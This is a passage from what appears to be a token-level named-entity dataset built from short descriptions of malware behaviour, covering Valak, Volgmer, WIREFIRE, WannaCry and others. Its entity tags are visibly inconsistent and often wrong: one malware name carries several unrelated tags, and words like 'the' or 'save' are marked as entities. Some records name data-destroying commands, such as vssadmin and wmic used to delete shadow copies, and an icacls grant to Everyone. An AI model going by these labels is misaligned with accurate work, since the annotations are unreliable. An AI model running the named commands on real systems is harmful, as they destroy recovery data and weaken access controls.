"Valak", - "has", - "the", - "ability", - "to", - "store", - "information", - "regarding", - "the", - "C2", - "server", - "and", - "downloads", - "in", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "downloaded", - "a", - "variety", - "of", - "modules", - "and", - "payloads", - "to", - "the", - "compromised", - "host,", - "including", - "IcedID", - "and", - "NetSupport", - "Manager", - "RAT-based", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "execute", - "JavaScript", - "containing", - "configuration", - "data", - "for", - "establishing", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "enumerate", - "local", - "admin", - "accounts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Valak", - "has", - "been", - "executed", - "via", - "Microsoft", - "Word", - "documents", - "containing", - "malicious", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "modify", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>", - "to", - "store", - "information", - "regarding", - "the", - "C2", - "server", - "and", - "downloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "download", - "additional", - "modules", - "and", - "malware", - "capable", - "of", - "using", - "separate", - "C2", - "channels." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "save", - "and", - "execute", - "files", - "as", - "alternate", - "data", - "streams", - "(ADS)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "base64", - "encode", - "and", - "XOR", - "encrypt", - "strings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "used", - "PowerShell", - "to", - "download", - "additional", - "modules." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "enumerate", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "use", - "the", - "Registry", - "for", - "code", - "updates", - "and", - "to", - "collect", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "used", - "<code>regsvr32.exe</code>", - "to", - "launch", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "collect", - "sensitive", - "mailing", - "information", - "from", - "Exchange", - "servers,", - "including", - "credentials", - "and", - "the", - "domain", - "certificate", - "of", - "an", - "enterprise." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "used", - "scheduled", - "tasks", - "to", - "execute", - "additional", - "payloads", - "and", - "to", - "gain", - "persistence", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "take", - "screenshots", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "determine", - "if", - "a", - "compromised", - "host", - "has", - "security", - "products", - "installed." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "used", - "packed", - "DLL", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "been", - "delivered", - "via", - "spearphishing", - "e-mails", - "with", - "password", - "protected", - "ZIP", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "been", - "delivered", - "via", - "malicious", - "links", - "in", - "e-mail." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Valak", - "has", - "returned", - "C2", - "data", - "as", - "encoded", - "ASCII." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "determine", - "the", - "Windows", - "version", - "and", - "computer", - "name", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "the", - "ability", - "to", - "identify", - "the", - "domain", - "and", - "the", - "MAC", - "and", - "IP", - "addresses", - "of", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "gather", - "information", - "regarding", - "the", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "has", - "used", - "HTTP", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "use", - "a", - ".NET", - "compiled", - "module", - "named", - "exchgrabber", - "to", - "enumerate", - "credentials", - "from", - "the", - "Credential", - "Manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Valak", - "can", - "use", - "<code>wmic", - "process", - "call", - "create</code>", - "in", - "a", - "scheduled", - "task", - "to", - "launch", - "plugins", - "and", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VaporRage", - "can", - "deobfuscate", - "XOR-encoded", - "shellcode", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VaporRage", - "has", - "the", - "ability", - "to", - "check", - "for", - "the", - "presence", - "of", - "a", - "specific", - "DLL", - "and", - "terminate", - "if", - "it", - "is", - "not", - "found." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VaporRage", - "has", - "the", - "ability", - "to", - "download", - "malicious", - "shellcode", - "to", - "compromised", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VaporRage", - "can", - "use", - "HTTP", - "to", - "download", - "shellcode", - "from", - "compromised", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Vasport", - "can", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Vasport", - "is", - "capable", - "of", - "tunneling", - "though", - "a", - "proxy." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Vasport", - "copies", - "itself", - "to", - "disk", - "and", - "creates", - "an", - "associated", - "run", - "key", - "Registry", - "entry", - "to", - "establish." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Vasport", - "creates", - "a", - "backdoor", - "by", - "making", - "a", - "connection", - "using", - "a", - "HTTP", - "POST." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Some", - "Volgmer", - "variants", - "use", - "SSL", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "deobfuscates", - "its", - "strings", - "and", - "APIs", - "once", - "its", - "executed." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Volgmer", - "variant", - "is", - "encoded", - "using", - "a", - "simple", - "XOR", - "cipher." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "delete", - "files", - "and", - "itself", - "after", - "infection", - "to", - "avoid", - "analysis." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "list", - "directories", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "stores", - "an", - "encoded", - "configuration", - "file", - "in", - "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "download", - "remote", - "files", - "and", - "additional", - "payloads", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Volgmer", - "variants", - "add", - "new", - "services", - "with", - "display", - "names", - "generated", - "by", - "a", - "list", - "of", - "hard-coded", - "strings", - "such", - "as", - "Application,", - "Background,", - "Security,", - "and", - "Windows,", - "presumably", - "as", - "a", - "way", - "to", - "masquerade", - "as", - "a", - "legitimate", - "service." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "modifies", - "the", - "Registry", - "to", - "store", - "an", - "encoded", - "configuration", - "file", - "in", - "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Volgmer", - "executes", - "payloads", - "using", - "the", - "Windows", - "API", - "call", - "CreateProcessW()." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "gather", - "a", - "list", - "of", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "checks", - "the", - "system", - "for", - "certain", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "uses", - "a", - "simple", - "XOR", - "cipher", - "to", - "encrypt", - "traffic", - "and", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "gather", - "system", - "information,", - "the", - "computer", - "name,", - "OS", - "version,", - "drive", - "and", - "serial", - "information", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "gather", - "the", - "IP", - "address", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "gather", - "information", - "about", - "TCP", - "connection", - "state." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "queries", - "the", - "system", - "to", - "identify", - "existing", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "can", - "execute", - "commands", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volgmer", - "installs", - "a", - "copy", - "of", - "itself", - "in", - "a", - "randomly", - "selected", - "service,", - "then", - "overwrites", - "the", - "ServiceDLL", - "entry", - "in", - "the", - "service's", - "Registry", - "entry.", - "Some", - "Volgmer", - "variants", - "also", - "install", - ".dll", - "files", - "as", - "services", - "with", - "names", - "generated", - "by", - "a", - "list", - "of", - "hard-coded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WARPWIRE", - "can", - "embed", - "itself", - "into", - "a", - "legitimate", - "file", - "on", - "compromised", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WARPWIRE", - "can", - "send", - "captured", - "credentials", - "to", - "C2", - "via", - "HTTP", - "`GET`", - "or", - "`POST`", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WARPWIRE", - "is", - "a", - "credential", - "harvester", - "written", - "in", - "JavaScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WARPWIRE", - "can", - "Base64", - "encode", - "captured", - "credentials", - "with", - "`btoa()`", - "prior", - "to", - "sending", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WARPWIRE", - "can", - "capture", - "credentials", - "submitted", - "during", - "the", - "web", - "logon", - "process", - "in", - "order", - "to", - "access", - "layer", - "seven", - "applications", - "such", - "as", - "RDP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Variants", - "of", - "WEBC2", - "achieve", - "persistence", - "by", - "using", - "DLL", - "search", - "order", - "hijacking,", - "usually", - "by", - "copying", - "the", - "DLL", - "file", - "to", - "<code>%SYSTEMROOT%</code>", - "(<code>C:\\WINDOWS\\ntshrui.dll</code>)." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WEBC2", - "can", - "download", - "and", - "execute", - "a", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "WEBC2", - "can", - "open", - "an", - "interactive", - "command", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINDSHIELD", - "is", - "capable", - "of", - "file", - "deletion", - "along", - "with", - "other", - "file", - "system", - "interaction." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINDSHIELD", - "C2", - "traffic", - "can", - "communicate", - "via", - "TCP", - "raw", - "sockets." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "WINDSHIELD", - "can", - "gather", - "Registry", - "values." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "WINDSHIELD", - "can", - "gather", - "the", - "victim", - "computer", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINDSHIELD", - "can", - "gather", - "the", - "victim", - "user", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "enumerate", - "active", - "windows." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "create", - "a", - "reverse", - "shell", - "that", - "utilizes", - "statically-linked", - "Wine", - "cmd.exe", - "code", - "to", - "emulate", - "Windows", - "command", - "prompt", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "enumerate", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "gather", - "information", - "about", - "the", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "gather", - "information", - "on", - "the", - "victim", - "username." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WINERACK", - "can", - "enumerate", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "can", - "modify", - "the", - "`visits.py`", - "component", - "of", - "Ivanti", - "Connect", - "Secure", - "VPNs", - "for", - "file", - "download", - "and", - "arbitrary", - "command", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "can", - "decode,", - "decrypt,", - "and", - "decompress", - "data", - "received", - "in", - "C2", - "HTTP", - "`POST`", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "compromised", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "can", - "Base64", - "encode", - "process", - "output", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "can", - "AES", - "encrypt", - "process", - "output", - "sent", - "from", - "compromised", - "devices", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "can", - "respond", - "to", - "specific", - "HTTP", - "`POST`", - "requests", - "to", - "`/api/v1/cav/client/visits`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIREFIRE", - "is", - "a", - "web", - "shell", - "that", - "can", - "download", - "files", - "to", - "and", - "execute", - "arbitrary", - "commands", - "from", - "compromised", - "Ivanti", - "Connect", - "Secure", - "VPNs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "Tor", - "for", - "command", - "and", - "control", - "traffic", - "and", - "routes", - "a", - "custom", - "cryptographic", - "protocol", - "over", - "the", - "Tor", - "circuit." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "encrypts", - "user", - "files", - "and", - "demands", - "that", - "a", - "ransom", - "be", - "paid", - "in", - "Bitcoin", - "to", - "decrypt", - "those", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "an", - "exploit", - "in", - "SMBv1", - "to", - "spread", - "itself", - "to", - "other", - "remote", - "systems", - "on", - "a", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "searches", - "for", - "variety", - "of", - "user", - "files", - "by", - "file", - "extension", - "before", - "encrypting", - "them", - "using", - "RSA", - "and", - "AES,", - "including", - "Office,", - "PDF,", - "image,", - "audio,", - "video,", - "source", - "code,", - "archive/compression", - "format,", - "and", - "key", - "and", - "certificate", - "files." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "<code>attrib", - "+h</code>", - "to", - "make", - "some", - "of", - "its", - "files", - "hidden." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "<code>vssadmin</code>,", - "<code>wbadmin</code>,", - "<code>bcdedit</code>,", - "and", - "<code>wmic</code>", - "to", - "delete", - "and", - "disable", - "operating", - "system", - "recovery", - "features." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "attempts", - "to", - "copy", - "itself", - "to", - "remote", - "computers", - "after", - "gaining", - "access", - "via", - "an", - "SMB", - "exploit." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "Tor", - "for", - "command", - "and", - "control", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WannaCry", - "contains", - "a", - "thread", - "that", - "will", - "attempt", - "to", - "scan", - "for", - "new", - "attached", - "drives", - "every", - "few", - "seconds.", - "If", - "one", - "is", - "identified,", - "it", - "will", - "encrypt", - "the", - "files", - "on", - "the", - "attached", - "device." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "enumerates", - "current", - "remote", - "desktop", - "sessions", - "and", - "tries", - "to", - "execute", - "the", - "malware", - "on", - "each", - "session." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "scans", - "its", - "local", - "network", - "segment", - "for", - "remote", - "systems", - "to", - "try", - "to", - "exploit", - "and", - "copy", - "itself", - "to." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "attempts", - "to", - "kill", - "processes", - "associated", - "with", - "Exchange,", - "Microsoft", - "SQL", - "Server,", - "and", - "MySQL", - "to", - "make", - "it", - "possible", - "to", - "encrypt", - "their", - "data", - "stores." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "WannaCry", - "will", - "attempt", - "to", - "determine", - "the", - "local", - "network", - "segment", - "it", - "is", - "a", - "part", - "of." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "uses", - "<code>attrib", - "+h</code>", - "and", - "<code>icacls", - ".", - "/grant", - "Everyone:F", - "/T", - "/C", - "/Q</code>", - "to", - "make", - "some", - "of", - "its", - "files", - "hidden", - "and", - "grant", - "all", - "users", - "full", - "access", - "controls." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "utilizes", - "<code>wmic</code>", - "to", - "delete", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WannaCry", - "creates", - "the", - "service", - "\"mssecsvc2.0\"", - "with", - "the", - "display", - "name", - "\"Microsoft", - "Security", - "Center", - 